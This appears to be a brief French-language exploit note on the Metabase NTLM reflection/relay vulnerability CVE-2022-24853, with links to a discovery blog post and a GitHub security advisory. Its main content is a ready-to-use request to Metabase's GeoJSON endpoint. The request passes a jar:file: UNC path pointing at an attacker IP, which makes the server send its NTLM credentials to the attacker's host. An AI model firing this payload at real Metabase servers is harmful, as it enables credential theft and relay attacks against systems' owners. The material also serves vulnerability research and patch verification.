
Attaque NTLM de Metabase
Attaque par réflexion/relais NTLM Metabase CVE-2022-24853
Article de blog sur la découverte : https://secure77.de/metabase-ntlm-relay-attack/
Avis de sécurité GitHub : https://github.com/metabase/metabase/security/advisories/GHSA-5cfq-582c-c38m
http://metabase-target-server.com/api/geojson?url=jar:file:\<attacker-ip>\test.txt!/